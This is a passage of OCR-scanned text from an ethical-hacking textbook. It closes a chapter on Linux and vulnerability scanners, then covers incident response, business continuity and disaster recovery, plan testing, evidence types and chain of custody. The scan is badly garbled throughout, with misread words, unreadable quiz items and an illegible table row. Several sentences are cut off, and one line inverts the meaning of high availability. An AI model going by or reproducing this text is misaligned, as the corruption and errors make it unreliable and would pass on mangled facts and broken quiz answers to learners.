network that generates a virtual map of the network that has been targeted.
Can reveal the ports that are open on a single or range of systems and report
on each.
• SAINT — A well-known commercial scanner that provides vulnerEibility scanning
and identification. It has the ability to scan for vulnerabilities on the Common
Vulnerabilities and Exposures (CVE) list andean prioritize and rank these
vulnerabilities from most to least critical.

• SARA — A system- 1 eve I scanner that is command line-based and has a Web -based
(][‘!. In sunk! of Itn L-nlinii a new inodii le for every conceivable action much Like
Kessus, SARA has the ability to work with other well-known open source products
to get a more comprehensive scan.

• LAN guard — A scanner that reports information, such as the service pack level
of each machine, missing security patches, open shares* open ports, key registry
entries, weak passwords, users and groups, and more.

• VLAD — A vulnerability scanner that is written in Perl. VLAD is designed to
identify vulnerabilities in the SANS Top 10 List.

CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools

31

CHAPTER SUMMARY

In your career as a security professional it is highly likely that you will encounter
operating systems other than the familiar Windows desktop. One of them is Linux.
While Windows still can Jay claim to the majority of desktops in the world, you still
need some familiarity with other operating systems to be complete as a security
professional.

As a security professional, it is important for you to always have an understanding
of the tools available to you, and using all the tools available to you requires some
knowledge of the Linux OS. In fact, several useful tools are available only in Linux
versions, so you have no other option but to learn Linux. The Linux OS is different from
the Windows operating system with a universe of different llles and folders that will
require some effort from you to learn. Lin ax offers a tremendous amount of benefits:
It is free and has a number of tools that will become available to you.

Additionally, Linux offers benefits that Windows just cannot offer, such as Live CDs.
Linux is one of the very few OSs that can be run off of removable media such as Hash
drives, CDs, DVDs, and portable hard drives. Linux can he hooted off removable media
without being installed on a hard drive or on a computer eliminating the need to
make changes to the computer itself.

KEY CONCEPTS AND TERMS

I p chain s
Ipttibles
Kernel

Live CD
Root user

318

PART 2 A Technical Overview of Hacking

CHAPTER 13 ASSESSMENT

1. The

is the core of the Linux operating

Z.

SYSU’IIL.

A, kernel
IL shell
C, GUI
\1 VPN

media.

runs completely from removable

A. Linux

B. Live CD
G. Kernel
D. Shell

Is a desktop in terrace Tor Linux.

A, KDti

B, CUJ1

C, Windows

D, Graphics

is a Le\3-lii!seJ i j 1 1 l-lIu vi- I’m Linux.

A. Terminal

B. KDU

C (momc
11 QUI

1. The ommand mv is used to remove empty
directories.

A. True

B. False

1. The command used to display where
you are in the file system is cd.

A, True

B. False

1. The command mv is designed to move files.

A. True
lii. I’alsr

S. The tommattd

h) remove ii tile ur icjlder,

A. xm

B. mv

C. dv
11 Is

1. The command

new directories.

A. eddir

B. mkdir

C. imdir
11 Isdir

1. “J ‘lie command

can be used

is used to create

is used to list the

files and subdirectories in a given location.

A. Is

B. dir

C. im
11 del

Incident Response and
Defensive Technologies

CHAPTER 14 Incident Response 320

CHAPTER 15 Defensive Technologies 344

Incident Response

A 5 A SECURITY PROFESSIONAL, you will be versed in a number of different
technologies and techniques, each designed to prevent an attack and secure
the organization, Each of the techniques you will learn is meant to prevent
an attack or limit its scope, but the reality is that attacks can and will happen, and
the techniques you have learned in this course cannot ever be guaranteed to stop
an attack from penetrating your organization. As a security professional, this is
a reality that you will have to accept.

Once you have accepted that an attack will inevitably penetrate your organization
at some point, your job now becomes one of how to respond to these situations:
This is the role of incident response. Incident response, as the name implies, is the
process of how you and your organization will respond to a security incident when
it occurs. Although security incidents are bound to happen, you shouldn’t sit by
and let them happen. You have to know how you will respond and the details
to this response.

Incident response is not only the act of how you respond to a security incident
but also the details involved in that response. If you respond incorrectly to an
incident you could make a bad situation worse. For example, not knowing what
to do, whom to call, or what the chain of command is in these situations would
potentially do further damage.

Finally, something that will have substantial impact on incident response s ks
potential legal aspect. When a security incident happens, it may frequently fall under
the banner of computer or related crimes, so it might require that additional care be
taken when responding. When you decide that you wish to pursue criminal charges,
you move from the realm of just responding to performing a formal investigation.
The formal investigation will include special techniques for gathering and processing
evidence for the purpose of potentially prosecuting the criminal later.

This chapter investigates and examines the various aspects of incident response
and how you can plan and design a process for responding to that breach in your
organization.

Chapter 14 Topics

This chapter covers the following topics and concepts:

• What a security incident is

• What the process of incident response is
What incident response plans (IRPs) are

• What planning for disaster and recovery is

■ What evidence handling and administration is

• What requirements of regulated industries are

Chapter 14 Goals

When you complete this chapter, you will be able to:

• List the components of incident response
List the goals of incident response

What Is a Security Incident?

A security incident in tin organization is a serious event that can occur at any point from
the desktop level to the servers and infrastructure that make the network work. A security
incident can be anything including accidental actions that result in a problem up to and
including the downright malicious. Regardless of why a security incident occurred, the
organization must respond appropriately.

A security incident can cover a lot of different events h but to clarity what constitutes
a security incident, the following guidelines tend to apply:

• The result is the theft or misuse of confidential information of any type, such as
customer in formation, patient information, or financial information.
• Tt substantially affects the network infrastructure and services, such as performance
or security.

• It provides a platform for launching attacks against a third party

• Other events can and will be included on this list, depending on the organization and the
environment in which it functions. For example, a company in the health care field would
this information, A security incident can be simply thought of as an event or situation
that adversely impacts the security stance of the organization.

322 PART 3 I Incident Response and Defensive Technologies

The concept of investigating □ crime versus investigating an incident can be confusing.
In reality, there area couple of points to consider when deciding the best course of action:

• Unless it is a serious crime with effects outside of your organization (for example, murder
or theft of credit card information), you have no legal obligation to involve the police
or press charges. Many businesses may opt not to report computer crimes because the

■ In the event of an incident in which you do want to involve law enforcement, you will
follow the rules of evidence. If you think things are moving toward this end, you should
not try to handle things internally; instead, opt to let law enforcement professionals deal
with the incident.

The Incident Response Process

Asa security professional, you are responsible for reducing ihe chance of a security
breach or incident to the lowest possible level. However, no matter how hard you try, the
reality is that you are only reducing the chance of a security incident not eliminating it,
which is nearly impossible. So as a well-prepared professional you musl plan how you will
react when a security incident occurs. This planning will reap benefits, as it will give you
the edge when determining what to do after an incident and how to do it. Proper security
incident response will determine whether an incident is dealt with swiftly and completely
or if it gels worse and out of control.

One of the first things to keep in mind when thinking about incident response is the
fact that you are very likely dealing with something that falls under the realm of crime,
so it wilt require that special care. Responding to an incident of computer crime can be
particularly challenging, as the evidence that needs to be collected is intangible.

FY I

>

Computer crime is already defined and covered in the United States (and other countries’)
legal codes} with varying degrees of scope and penalties. In the United States, computer crime is
covered primarily under U.S. Code Title 18, 1030, titled “Fraud and related activity in connection
with computers.* This code is part of the Computer Fraud and Abuse of Act of 1986 and has
been amended three times since then: in 1994, 1996, and 2001 .

When computer crime involves attacks or activities that cross state or even national borders, the
rules can change substantially. The very definition of computer crime can vary widely depending
on the jurisdiction involved. Therefore a computer crime involving more than one jurisdiction
will require much more care.

CHAPTER 14 Incident Response

Computer crime is defined as a criminal act in which a computer or similar device
is involved as either the source or target of an attack. Computer crime can involve any
act that affects national security or involves fraud, identity theft, or the distribution
of malware. Computer crime does not discriminate against activities that are initiated
via the Internet or launched from a private network.

Incident Response Policies, Procedures, and Guidelines

The next point that is important when considering incident response is to have a policy
in place that defines the procedures and guidelines for responding to a security incident.
The policy will deiine the course of action that a company or organization will take in the
time following a security incident. The policy is quite commonly supplemented by proce-
dures and guidelines that specify additional details, but the following are usually included:

■ The individuals who will take responsibility for determining when and if a security
incident has occurred

• The individuals and /or departments that are to be part of the initial notification
that a security incident has occurred

• The means through which they will be notified: e-mail, phone, or face to face

• The responsible person or parties that will take lead for responding to the incident

• Appropriate response guidelines for the given security incident

So, who will be involved in the incident response process? This depends on the organi-
zation, the assets involved, and the overall severity of the situation. Several departments
within an organization can work together — human resources, public relations, infor-
mation technology, corporate security, and others. The idea is to get the appropriate
personnel and departments involved in order to properly deal with the situation at hand.
These key people can also determine which information can be released and to whom.
For example, employees may not be privy to all the details of security incident and may
in fact be informed on only a need-to-know basis.

FYI

No less important in this process is the control of information or ‘”need to know.” The
knowledge of an incident in the wrong hands can be catastrophic. Information of a security
breach can rattle the confidence of the public, shareholders, employees, and customers, and as
such should be tightly controlled wherever possible. The parties that are part of the first response
effort will typically be the only ones with definite need to know, with others being added to the
list later on.

324 PART 3 Incident Response and Defensive Technologies

Phases of an Incident and Response

remove steps in this process based
on need or their unique situation,
but generally will follow similar steps.
The idea is to have a process clearly
defined and to know responsibilities
ahead of time so when a security
incident happens, you know the
process to deal with it.

There are several phases in the incident response
process. Each incident will traverse these phases as
the incident occurs, evolves, and moves to its final

resolution, Every phase has distinct actions that take

you move on, but let’s take a high-level look at the
incident response process itself, Table 14-1 defines
the phases of incident response and w r hat happens
at each step.

J

Incident Response Team

As organizations grow in size and importance, it is likely that they will build
or already have a group known as mi incident response team. These teams will
be composed of individuals that have the training and experience to properly
collect and preserve evidence of a crime and the associated components of the
response process. Incident response teams must have both the proper training
and the requisite experience to respond to and Investigate a security incident.
As a security professional, it is very likely that you will take part in this team
in some c tip a city as a key member or otherwise.

One of the components of incident response is the first res ponder or
responders who will be the initial individuals to respond to an incident when
one is reported, \n the broadest sense, these can be the individuals appropriate
for the security incident concerned > including the following:

• FT personnel
• Legal representation

• Human resources

• Public relations

• Security olficers

• » Chief security officer

The goal of your security response team is to have in place key people who are
w r ell versed in and aivare of how to deal with security incidents. These members
will know what to do and have been drilled on how to do it in the event tin
incident occurs.

CHAPTER 14 Incident Response

325

table u-1 Phases of incident response.

PHASE

Incident
identification

Triage

Containment

Investigation

DESCRIPTION

It is important for you to establish early on just what has actually occurred.
Is the incident an actual security incident or is it something else? The incident
response team will be responsible for making this determination as well as
making the determination or discovery as to what was affected.

The next step after the determination that a security incident has occurred
is to determine how seriously the incident has affected critical systems or data.
Remember that not all systems or services will be affected the same way, and
some will require more attention than others. Also remember that some systems
are mission-critical and will require more attention as well. In a computer
crime incident scenario, once the incident response team has evaluated the
situation and determined the extent of the incidents, a triage approach will
be implemented, and the situation will be responded to according to criticality.
If multiple events have occurred, the most serious event will be addressed first,
and remaining events will be investigated based on risk level.

It is necessary early on in the process of the incident response to contain and
control the crime scene as much as possible. It is important that no alterations
of the crime scene or tampering of any sort occur to avoid damaging evidence,
Disconnecting any devices, wires, peripherals, or even shutting down the system
would constitute tampering. It is important to let trained professionals do their
job at the crime scene.

As the response team discovers the cause of the problem, the investigative
process can start. The investigation is designed to methodically collect evidence
without destroying or altering it in any way. This process can be performed
by internal personnel or optionally by an external team where appropriate.
The key detail in either case is that the team involved in the investigative
process understand how to collect the evidence properly, as the end result
of the process may be to take this collected information to court.

So who may investigate a security incident? This may vary depending on the
extent and type of security breach. In some cases, internal teams or consultants
may be all that are needed to investigate and analyze a crime scene; however,
in some cases that may not be enough. It is possible under certain conditions
to get local law enforcement involved in the investigation of a crime.

Of course this option will vary depending on the skills of local law enforcement.
In some cases police departments are very adept at dealing with computer crime,
but this is not always the case.

Investigations should never be taken lightly and once local law enforcement
is involved, other issues arise. Police departments may not be able to respond
En a timely fashion, as corporate security problems are not part of the police
mission and therefore are low priority.

326 PART 3 Incident Response and Defensive technologies

table 14-1 continued

PHASE

Analysis
and tracking

Recovery
and Repair

Debriefing
and feedback

DESCRIPTION

Evidence that has been gathered is useless unless it is examined and
dissected to determine what has occurred. At this point you will either be
involving external professionals to examine the evidence or employing
your own internal teams. These teams will be responsible for determining
what evidence is relevant to the investigation and which is not.

During the recovery and repair phase it is assumed that all relevant
evidence has been collected and the scene has been cleaned. At this point
the investigation of the security incident has been completed and the
affected systems can be restored and returned to service. This process will
include restoring and rebuilding operating systems with their applications
and data from backups or drive images.

In the event that a system has experienced substantial damage in the
course of an attack, it becomes necessary to repair the system. The recovery
process is designed to deal with rebuilding a system after evidence has
been collected, but it does not account for potential damages done that
may need to be repaired. Additionally, the repair process may be needed
as the collected evidence may have required the removal of components
(that will need to be replaced) for preservation of evidence.

When it is all said and done, you will need to debrief and obtain feedback
from all involved. The incident happened for a reason and presumably at
this point you have determined what this reason is. The goal of this phase
is to determine what you diid right, what you did wrong, and how to
improve. The lessons learned during this debriefing can then be used
to determine the changes that will be made to improve the incident
response process for the next time it is put into effect. Additionally,
depending on the incident it may be necessary to start the process of
informing clients and other agencies and regulatory bodies of the breach,
This last point may in fact be the most important one because faiiure to
inform the appropriate regulatory bodies can mean you or your company
is guilty of a crime.

CHAPTER 14 Incident Response

327

It is not unheard of for an organization to have no IRP or Ore that is grossly out of date.
In some cases, organizations had a sound security response plan at one point, but it was never
updated, resulting in a plan that cannot effectively deal with current situations. In other cases,
this plan was overlooked, meaning that no one ever got around to or even thought of creating
one in the first place.

^ MOTE

Remem ber that a security
IRP will include all the steps
incident and legally protect the
company. A security incident
that is investigated improperly
can result in substantial legal
problems for the company.

Incident Response Plans (IRPs)

The composition of the response team is important, but so is
the process team members must follow to respond to an incident,
Once a security incident has been recognized and dec tared, it is
vital that the team have a plan to follow. This incident response
plan (IRP) will include all the steps and detEiils required to inves-
tigate the crime as necessary,

The Role of Business Continuity Plans (BCPs)

A plan that will become an important part of security in your organization is eui item
known as a business continuity plan (BCP), This policy defines how the organization
will maintain what is accepted as normal day-to-day business in the event of a security
incident or other events disruptive to the business. The importance of the BCP cannot
be overstated as it is a necessary item in ensuring that the business continues to perform
and can survive through a disaster, A BCP ensures protection for vital systems, services*
and documents, informing key stakeholders and recovering assets as necessary. The BCP
will include issues relating to infrastructure and maintaining the services needed to keep
tJie business running using techniques such as fault tolerance and high availability,
Purihermore, because the business requirements change periodically, the BCP will need
to be reviewed on a regular basis to ensure it is still relevant.

( FY> V –

A BCP does not dictate how the entire business will be brought back to an operational state;
it addresses how to maintain some semblance of business operations. A BCP is designed to
ensure that your company continues to deliver on its mission in the event of either a human
or natural disaster. Cleaning up and restoring the business in the event of a disaster is the
responsibility of a disaster recovery plan (DRP).

328 PART 3 Incident Response and Defensive Tech nol agios

Next to a BCP. and closely intertwined with it. is the ] JRP.Tbis document or plan
states a policy that defines how personnel and assets will be safeguarded in the event
of a disaster and how those assets will be restored and brought back to an operating state
after the disaster passes. The DRP typically will include a list of responsible individuals
that will be involved in the recovery process, hardware and software inventory, steps
to respond and address the outage, and ways to rebuild affected systems.

Techniques That Support Business Continuity and Disaster Recovery

There are several techniques that can be used to keep the organization running and
diminish the impact of a disaster when it occurs. Several of these techniques Eire discussed
in this section.

Fauft tolerance is a valuable tool in your arsenal, as it will give you the Eibility to
weather potential failures while still providing some measure of service. While this level
of service may not be optimal, it should be enough to maintain some level of business
operations even if not at the normal level of performance. Fault tolerant mechanisms
include service and infrastructure duplication designed to handle a component failure
when it occurs.

Common examples of fault tolerant devices include:

• Redundant array of independent disks (RAID) — Provides an array of disks that
are configured so that if one disk fails, access to data or applications is not affected
• Server clustering — A technique used to group servers together in such a way
that if one server falls, access to an application is not lost

• • Redundant power — Can be provided by using systems such as backup generators
and uninterrupted power supplies

Another tool in your toolbox is something known as high availability. This technique
is simply a gauge of how well the system is providing its service, specifically how available
the system actually Is. Ideally a system should be available 1(30 percent of the time,
but in practice this is not possible. High availability simply states, as a percentage, how
available a system is, so the closer a system’s avaihibilily is to 100 percent, the less time
it has spent online. High availability can be attained by having redundant and relUible
backup systems.

• i Fyl i

Tault tolerance can be applied to just about any service and system available, with the limiting
factors being cost and requirements. You will use fault tolerant mechanisms on those systems
and services that are deemed of a higher importance and would adversely affect the business,
if they were taken offline. In cases where the cost of the fault tolerance systems is higher than
the cost of actually losing the service, the use of such systems would be unnecessary.

CHAPTER 14 Incident Response

329

NOTE

SLAs are legal contracts and
as such can have penalties for
being broken. An SLA typically
has provisions that penalize the
service provider in the event
that it does not meet its service
obligations. Penalties can
include financial penalties or
even termination of service for
repeated or flagrant violation.

An item that is generally not found too far from high avail-
ability and fault tolerance is something known as a service level
agreement (SLA). This is a document that spells out the obliga-
tions of the service provider to the client. Specifically, an SLA
is a legal contract that lays out what the service provider will
provide, at what performance level, and steps that will he taken
in the event of an outage. This document can be very detailed
and include speciiic performance and availability levels that are
expected and the associated penalties for not meeting these perfor-
mance levels. Additionally* it will spell out the parties responsible
and the extent of their responsibilities. In the event of a disaster,
the individuals listed on the SLA will take care of the problems
related to the disaster.

Alternate sites are another technique that is used in the event of a system failure or
disaster The idea is to have another location from which to conduct business operations in
the event of a disaster. Under ideal conditions, an alternate site is where all operations will
be moved if the primary or normal site is no longer in a situation to provide said services.

There are three types of alternate sites that can be utilized by an organization:

• Cold site — This type of site is the most basic type of alternate site and the most
inexpensive to maintain. A cold site, by normal definition t does not include
backed- up copies of data and con figuration data from the primary location.
This type of site also does not include any sort of hardware set up and in place.
IIowever h a cold site does include basic facilities and power. The cold site is the
cheapest option, but it will mean greater outage times as this infrastructure
will need to be built and restored prior to going back online.

Warm site — A warm site is the middle-of-the-road option offering a balance
between expense and outage time. A warm site typically has some, if not all.
necessary hardware in place with other items such as power
and Internet connectivity already established h though not
to the degree that the primary site has in place. These types
of sites also have some backups on hand, though they may
be out of date by several days or even weeks.

• Hot site — A hot site represents the top of the line here.
It means little to no downtime but also the greatest expense.
These types of sites typically have a high degree of synchro-
nization with the primary site up to the point of completely
duplicating it. This type of setup requires a high degree
of complexity in the form of complex network links and
other systems and services designed to keep the sites in sync.
This level of complexity adds to the expense of the site,
but also has the advantage of substantially reduced
for eliminated) downtime.

P NOTE

Alternate sites played a huge
role for companies that were
hit by Hurricane Katrina. Some
companies that were hit by
Katrina suffered huge losses
because they did not have
alternate sites as part of their
disaster planning. Of course
an event like Katrina is rare,
but there still exists a potential
for such an event; therefore^
appropriate steps should be
considered and evaluated.

330 PAHT 3 Incident Response and Defensive Technologies

Before Ein alternate site can work, however, you need to have ei backup I hat must
be kept secure because it contains information about your company, clients, and infra-
structure. Backups should be stored safely and securely, with copies being kept both
on site and offsite to give optimal protection. Additionally, backups should always be
stored on their own media and ideally stored in a locked location offsite. Other safeguards
should be taken to protect the backups from environmental concerns such as fire, floods,
and earthquakes.

Suitable backup storage locations will depend on the organization’s own requirements
and other situ tit ions. Recent backups can usually be stored onsite, with older archival
copies stored someplace offsite. The offsite location is used in the event that the primary
site suffers a major event that renders systems and data residing there either unusable
or inaccessible.

Recovering Systems

Your BCP and DRP will spell out the process for recovering data, systems, and other
sensitive information. Secure recovery requires a number of items to be in place, primary
n mong which is the requirement to have an administrator designated to guide the
recovery process. As with any backup and recovery process, steps should be taken
to review the steps and relevance of the process* and update it where necessary.

Recovering From a Security Incident

When security incidents happen, and they will happen h you have to have a plan to restore
business operations as quickly and effectively as possible. This requires that you and
your team correctly assess the damage, complete the investigation, and then initiate the
recovery process. During the time from the initial security incident onward* the organi-
zation presumably has been operating at some reduced c tip a city and you need to recover
the systems and environment as quickly as possible to restore normal business operations.
Other key details are the definite need to generate a report on what has happened and
the ability to communicate with appropriate team members.

Loss Control and Damage Assessment

Early on. an assessment needs to be performed in order to determine the extent

of damages and expected outage or downtime. During this phase, efforts are moving

toward damage control.

Some steps you can expect to follow during the damage Lissi.’ssment are:

• The first res ponder may assess the area of damage to determine the next
course of action.
• You should determine the amount of damage to facility, hardware^ systems,
and networks.

• I f you r comp a ny h a s s u f fered vir tu a I — ra t h er tha n p hy sic a I — dam age ,
you may need to examine log files h identify which accounts have been
compromised, or identify which files have been modified during the attack.

• CHAPTER 14 Incident Response

331

• If your company has suffered physical — and not conceptual — damage, you may
need to take a physical inventory to determine which devices have been stolen
may have been damaged or stolen.
• One of the most important and overlooked components of damage assessment
is to determine whether the attack is over: attempting to react to an attack that
is still in progress could do more harm than good.

• Inside the organization it is important to determine to whom to report security incidents;
this is someone who has accountability and responsibility for safeguarding the organiza-
tion’s assets. These individuals can be different depending on the organization , but each
of them will ultimately have accountability for security within the organization , The
following is a list of potential reporting points in the organization:

When working with incident recovery and analysis, an important part of the process
is the business impact analysis (BIA). This term covers the process of analyzing existing
risk and using various strategies to minimize said risk. The outcome of this process is
a IMA report that covers all the potential risks uncovered and their potential impact on
the organization. The BIA should go a long way toward illustrating the impact of any loss
(o the organization in which systems are integrated and rely on each other in increasing
amounts.

In the context of the overall disaster recovery and planning, the BIA is used to illustrate
the costs of a failure. For example, a BIA will demonstrate costs such as:

• Work backlogs

• Profit/ loss

• Overtime

• System repair and replacement

• Legal fees

• Public relations

• Insurance costs

• Chief information security officer (CISO)
• In formation security officer [ISO)

• • Chief security officer (CSO)

• Chief exec u ti ve office r ( C CO )

• Chief information officer [CIO)

• Chief operating officer (COO)

NOTE

The ultimate goal of having
an individual who is charged

with the overall responsibility
for security in the organization
is to have leadership and legal
accountability,

A BIA report emphasizes the importance of each of the various business components
and proposes fund allocation strategies to protect them.

332 PART 3 I Incident Response and Defensive Technologies

Planning for Disaster and Recovery

In order to properly plan Tor disaster recovery you will need to know where you stand
{specifically where the company stands). You need to completely assess the state of
preparedness of the organization and then you can understand what to do in order
to he properly prepared.

In order to properly plan for disaster recovery, the following guidelines and best
practices should he observed:

• Always consider and evaluate the proper redundancy measures for all critical
resources. Look for adequate protection for systems such as servers h routers,
and other devices in case they are needed for emergency usage.
• Check with all critical service providers to ensure that adequate protection
has been taken to guarantee that the services provided will be available.

• Check for the existence of or the ability to obtain spare hardware wherever
necessary. Ensure that the devices not only are appropriate for use but also
can be obtained in an emergency.

• » Evaluate any existing SLAs that are currently In place so that you know
what constitutes acceptable downtime.

Eh tab llsh median i sm s for c o m m u n icat ion that do not require company
resources fas they may be unavailable). Such communication channels
should also take into account that power mEiy be unavailable,

• Ensure that the organization’s designated alternate site can be accessed immediately.
• Identify and document any and all points of failure, as well as any up-to-dcite
redundancy measures that have been put in place to safeguard these points.

• Ensure that the company’s redundant storage is secure.

• Testing and Evaluation

A plan can be well thought out and account for seemingly everything, but the reality
is that unless it is periodically tested and retested, you can never tell just how effective
or relevant it may be. Testing is the process through which a plan has its effectiveness
measured and evaluated. When a plan is tested, care should be taken to ensure that the
processes involved work as designed and intended.

Even if a plan is properly evaluated and tested, it must be reviewed regularly, as limes
change and the plan must adapt. Some of events that can affect or diminish the overall
strength of a plan include:

• Situational and environmental changes that are introduced as an organization
evolves to take on new roles and challenges
• Change of equipment due to upgrades and replacements

• Ignorance about or lack of interest in updating the plan

• New personnel who have no interest in or knowledge of the plan

• CHAPTER 14 Incident Response

333

These points plus others necessitate the regular testing and evaluation of ei plan in order
to prevent its obsolescence. When a plan is tested, special attention should be placed on
the plan’s strengths and weaknesses, including:

• Is the plan feasible and is it a viable recovery and repair process?
• Are backup facilities adequEite for the environment?

• Are adequate human re sources allocated to the process, and are these teams
properly trained?

• Where are the perceived or real weaknesses in the current process?

• Are teams properly trained to deal with the recovery process?

• Can the process, as designed, carry out the tasks assigned to it?

• Because incident response and the plans that go with it sometimes require special skills,
training may be required lor all parties and teams involved. The range of special skills
is large with extra training required for tasks that involve:

• System recovery and repair
• Fire suppression

• ■ Evacuation of personnel

• Backup procedures
• Power restoration

• Tor the test to verify the effectiveness of a plan, it is necessary to simulate as closely
as possible the real conditions under which the plan will operate. In order to do this,,
consider the following factors:

• The actual size of the installation

■ Data processing services and their sensitivity to failure

■ Service level expected by users and the organization

• A cce ptab le d ow r n tim e and r ec o very
• Type and number of locations involved

• Cost of and budget for performing the test

• Preparation and Staging of Testing Procedures

Performing the right lest on your plan will ensure accurate and appropriate results that
are the most useful to you. Testing suites that can be performed on apian include:

• Walkthrough
• Checklist

• Simulation

• Parallel

• Full interruption

• Each test offers unique benefits that give it the ability to reveal different and sometimes
more accurate results.

334 PART 3 Incident Response and Defensive Technologies

Structured Walkthrough

In this type of test, members of the disaster recovery I earn get together around a table
and read through the plan En gel her. The goai is lo read through I bi a steps and note how
each department gets responsibilities handed off to it and how it interacts. This type
of test will uncover potential gaps and bottlenecks in the response.

Checklist

This type of test will assist in verifying that sufficient supplies are stored and available
at the backup site, contact information is current, and the recovery plan is accessible
and a va liable to all who need it in an emergency. The recovery team should review
and identify weak areas but also resources that are tivai table.

Simulations

In this type of test, a disaster is simulated in such a way that normal business opera-
tions are not adversely affected. The test will seek to simulate a disaster as accurately
as practical given the budget and situation, Features of this test inctude practicing
backup and restore operations, incident response, communication and coordination
of efforts, alternative site usage, and other similar details. Tasks or processes that cannot
be economically or practically completed should be omitted where necessary, including
travel requirements, taking down key systems, and involvement of certain teams.

Full Interruption

In this type of test, the complete disaster recovery plan is enacted under simulated
conditions. This test will very closely simulate the event of a disaster, including the
simulation of damage to systems such as communications and other services.

Due to the fact that this type of test interrupts services and the organization itself,
extreme caution should be exercised to avoid a major impact on the organization,
hleally tins type of tesl should hi- scheduled during slow periods, al Liu- end of the
month, after business hours, or at any point where critical business operations are
such that they will not be affected.

Frequency of Tests

Testing must be run in order to ensure that the plan is still effective, but this testing
is not a one-lime thing and should be run on a regular basis to ensure that the plan
remains effective. Tests should be considered and run as often as is practical —
for example, quarterly, semiannually, or annually.

Analysis of Test Results

The purpose of all this testing is to provide data on how well a plan is working. Personnel
should log events during the test that will help evaluate the results. The testing process
should provide feedback to the disaster recovery team Lo ensure that the plan is adequate.

CHAPTER 14 Incident Response

335

The recovery team, which normally consists of key management personnel, should
assess test results and analyze recommendations from various team leaders regarding
improvements or modifications for the plan. It is essential to quantitatively measure
the lest results, including:

• Elapsed time to perform various activities
• A cc u ra cy o f e ac h act i v ity

• Amount of work completed

• The results of the tests will most likely lead to changes in the plan. These changes should
enhance the plan and provide a more workable recovery process. Testing the disaster
recovery plan should be efficient and cost effective. It provides a means of continually
increasing the level of performance and quality of the plan and the people who execute
it. A carefully tested plan provides the organization with the confidence and experience
necessary to respond to a real emergency. Disaster recovery plan testing should consider
scheduled and unscheduled tests for both partial and total disasters.

Once the incident response process has been defined at a high
level, it is time to turn your attention toward the collection of
evidence from a crime scene. Although you may be involved
in this process, it is possible that you will also involve special
teams or external consultants.

Evidence Collection Techniques

Proper collection of evidence is essential and is something that is
best left to professionals whenever the need arises. When a crime
has been suspected, it may hecome necessary to expand the
incident response to include trained professionals in the process.
The process here is really one of forensics. or the methodical and
defensible process of collecting information from a crime scene. This is a process best left
to those professionals trained to do it because novices can inadvertently damage evidence
in such a way that makes the investigation impossible or indefensible in court. Trained
personnel will know how to avoid these blunders and properly collect everything relevant.

Evidence Types

Not all evidence is created equal and should not be treated as such because evidence is
what ultimately proves your case. Collecting the wrong evidence or treating evidence
incorrectly can have an untold impact on your case, which should not be underestimated.

Table 14-2 lists some of the different types of evidence that can be collected and what
makes each unique.

NOTE

Involvement of those not trained
to handle evidence properly can
result in evidence that is not
adequate to prosecute a crime or
is indefensible in court. Typically
those who collect evidence from
crime scenes are specially trained
to do so and haye the required
experience to do so to ensure
that evidence is true and correct
and is collected in a way that can
be used in court.

336 PART 3 Incident Response and Defensive Technologies

TABLE 14-2 Typ<

?s of evidence.

EVIDENCE

DESCRIPTION

Best

Best evidence is a category of evidence that is admissible by requirement
in any court of Jaw. In the case of documents., best evidence is the original
document. The existence of best evidence elim inates your ability to use
any copies of the same evidence in court.

1 l u Ca 1 y

F \x i fl»P n rp ~h h tit^ thp H^firtitiY^n fit – i.pf~nriri?irk/ PuiHpnrp ii anu pviripnrp

l_ V 1 VJ lT 1 1 >i_ C_ L 1 1 □ L II Lj Ll PUT u\T 1 II II LfWI 1 %J 1 jCVUI lUal y CVIuCI ILC 1 J LI 1 ly C_ V lUt 1 1 LC

that is a copy of the original evidence. This could be items such as backups
and drive images.

This type of evidence may not always be admissible in a court of law
and is not admissible if best evidence of the item exists.

Direct

Direct evidence is evidence that is received as the result of testimony
or interview of an individual regarding something he or she directly
experienced. This individual could have obtained the evidence as a result
of observation. Evidence in this category can prove a case.

Conclusive

Evidence that fits within the category of conclusive evidence is evidence
that is above dispute. Conclusive evidence is considered so strong that
it directly overrides all other evidence types by its existence.

Opinion

Evidence that of this type is derived from an individual’s background
and experience.

Opinion evidence is divided into the following types:

Expert — Any evidence that is based upon known facts r experience,,
and an expert’s own knowledge

Non-expert — The opinion evidence of non-experts is limited to that
based upon the witness’s perception of a series of events where
that perception is relevant to the case.

Corroborative

Evidence in this cateqorv is evidence that is obtained from multiple
sources and is supportive in nature. This type of evidence cannot stand
on its own and is used to bolster the strength of other evidence.

Circumstantial

Circumstantial evidence is any evidence that indirectly proves a fact
through the use of deduction.

CHAPTER 14 Incident Response

Chair of Custody

When collecting evidence for use in court, the chain of custody must be maintained at all
times. The chain of custody is simple in theory as it documents the whereabouts, of the
evidence from the point of collection to the time it is presented in court and after, when
it is returned to its owner or destroyed. The chain is essential as any breaks or question
ahout the status of evidence at any point can result in a case being thrown out, A chain of
custody will need to include every detail about the evidence such as how it was collected
up to how it iv as processed.

A chain of custody can be thought of as enforcing or maintaining six key points at any
point. These points will ensure that you focus on how information is handled at every step.

Chain of custody should always maintain these six: points by asking the following
questions:

• What evidence has been collected?
■ How was the evidence obtained?

• W’ hen was the evidence collected.-‘

• Who are the individuals who handled the evidence?

• What reason did each person have for handling the evidence:

• Where has the evidence traveled and where was this evidence ultimately stored?

Also remember to keep the chain of custody information up to date at all times. Every
time any evidence is handled by an investigator, a record must he kept and updated
to reflect this. This information should explain every detail such as what the evidence
actually consists of, where it originated, and where it was delivered. It is important that
no gaps exist at any point.

Additionally, for added legal protection, evidence can be validated through the use
of hashing to prove that it has not been altered. Ideally the evidence you collected at the
crime scene is the same evidence you present in court.

Remember, lack of a verifiable chain of custody is enough to lose a case.

Computer Removal

When any sort of computer crime is logged and reported it becomes necessary to examine
the system and in some cases remove the computer from the crime scene. Of course, such
a seizure of a computer means that the chain-of-custody requirements come into play and
the system must he tagged and tracked up until it is presented in court.

Also do not forget thai com pu ter evidence, like many different types of evidence, may
require specific legal authorization to be taken. Requirements will vary depending on the
company and situation in question, but it is another item to consider.

338 PART 3 Incident Response and Defensive Technologies

Chain of Custody Key in Bonds Case

While not related to computer crime, this article demonstrates the concept of chain of
custody and how it can call a case into question.

”Before the federal government attempts to convince a jury that Barry Bonds lied under
oath when he denied he knowingly used steroids, prosecutors face another challenge:
proving the drug tests which were positive for steroids belong to baseball’s home run
king and that the test results are reliable and relevant to the perjury trial set to begin
March 2.

Bond 5’ defense team is expected to press the issue and ask Judge Susan lllston to throw
out the evidence in pretrial motions due Thursday, tllston will have to weigh evidence
the government seized in its 2003 raid of BALCO against the following facts:

